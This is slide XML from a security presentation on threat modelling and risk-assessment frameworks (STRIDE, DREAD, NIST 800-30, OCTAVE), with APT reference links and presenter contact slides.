            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Level 4:	State sponsored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381000"/>
            <a:ext cx="8229600" cy="129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What About Threat Modeling &amp; Risk Assessment?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76400"/>
            <a:ext cx="8382000" cy="464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Threat Modeling:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STRIDE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DREAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>FAIR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Risk Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ISO 27000 Series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NIST 800-30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>OCTAVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Good, but a little too much for where we are going with this…</a:t>
            </a:r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381000"/>
            <a:ext cx="82296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600" dirty="0" smtClean="0"/>
              <a:t>Threat Modeling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1447800"/>
            <a:ext cx="8534400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Attacker-Centric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Attacker-centric threat modeling starts with an attacker, and evaluates their goals, and how they might achieve them. Attacker's </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>motivations are considered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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Asset-Centric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Asset-centric threat modeling involves starting from assets entrusted to a system, such as a collection of sensitive personal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>Software-Centric</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Software-centric threat modeling (also called 'system-centric,' 'design-centric,' or 'architecture-centric') starts from the design of the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>system, and attempts to step through a model of the system, looking for types of attacks against each element of the model. This </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>approach is used in threat modeling in Microsoft's Security Development Lifecycle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>We’re approaching from somewhere between the Attacker-Centric and Asset-Centric.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Source: 	 http://en.wikipedia.org/wiki/Threat_model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr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609600"/>
            <a:ext cx="82296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smtClean="0"/>
              <a:t>Risk Assessment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76400"/>
            <a:ext cx="8382000" cy="441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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Risk Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ISO 27000 series</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>NIST 800-30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>OCTAVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Formula based evaluations like (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A * V * T = R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>) that just get more complex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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Asset	* 	Threat		* 	Vulnerability	= 	Risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities are still the key factor in most systems of assessing risk.</a:t>
            </a:r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152400" y="685800"/>
            <a:ext cx="88392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Vulnerability Tracking Systems, Threat Modeling &amp; Risk Assessment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905000"/>
            <a:ext cx="8382000" cy="441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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>We aren’t saying to get rid of all of these.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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>They each have value, and a purpose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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>You definitely want to start with a traditional information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>assurance program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Just don’t stay with a traditional program if you REALLY care about </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1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not getting owned!!!!!!!!!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="20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2296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References for APT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83820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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.advanced-persistent-threat.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.boozallen.com/insights/expertvoices/advanced-persistent-threat?pg=all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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8153400" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Holla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @ CG....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF66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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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28600" y="1752600"/>
            <a:ext cx="86868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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:				</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [ ] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>laresconsulting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[ ] com</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:			</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>twitter.com/carnal0wnage</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Work</a:t>
            </a:r>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://lares.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blog</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>://carnal0wnage.attackresearch.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4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2544" y="2833596"/>
            <a:ext cx="3784256" cy="256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51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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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8153400" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Holla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @ j0e....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF66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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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28600" y="1752600"/>
            <a:ext cx="86868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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toll Free:			1-866-892-2132</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email:				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>joe@strategicsec.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter:			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://twitter.com/j0emccray</a:t>
            </a:r>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Slideshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.slideshare.net/joemccray</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LinkedIn:			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.linkedin.com/in/joemccray</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="550863" indent="-5508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50863" algn="l"/>
                <a:tab pos="1008063" algn="l"/>
                <a:tab pos="1465263" algn="l"/>
                <a:tab pos="1922463" algn="l"/>
                <a:tab pos="2379663" algn="l"/>
                <a:tab pos="2836863" algn="l"/>
                <a:tab pos="3294063" algn="l"/>
                <a:tab pos="3751263" algn="l"/>
                <a:tab pos="4208463" algn="l"/>
                <a:tab pos="4665663" algn="l"/>
                <a:tab pos="5122863" algn="l"/>
                <a:tab pos="5580063" algn="l"/>
                <a:tab pos="6037263" algn="l"/>
                <a:tab pos="6494463" algn="l"/>
                <a:tab pos="6951663" algn="l"/>
                <a:tab pos="7408863" algn="l"/>
                <a:tab pos="7866063" algn="l"/>
                <a:tab pos="8323263" algn="l"/>
                <a:tab pos="8780463" algn="l"/>
                <a:tab pos="9237663" algn="l"/>
                <a:tab pos="9694863" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="16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1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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
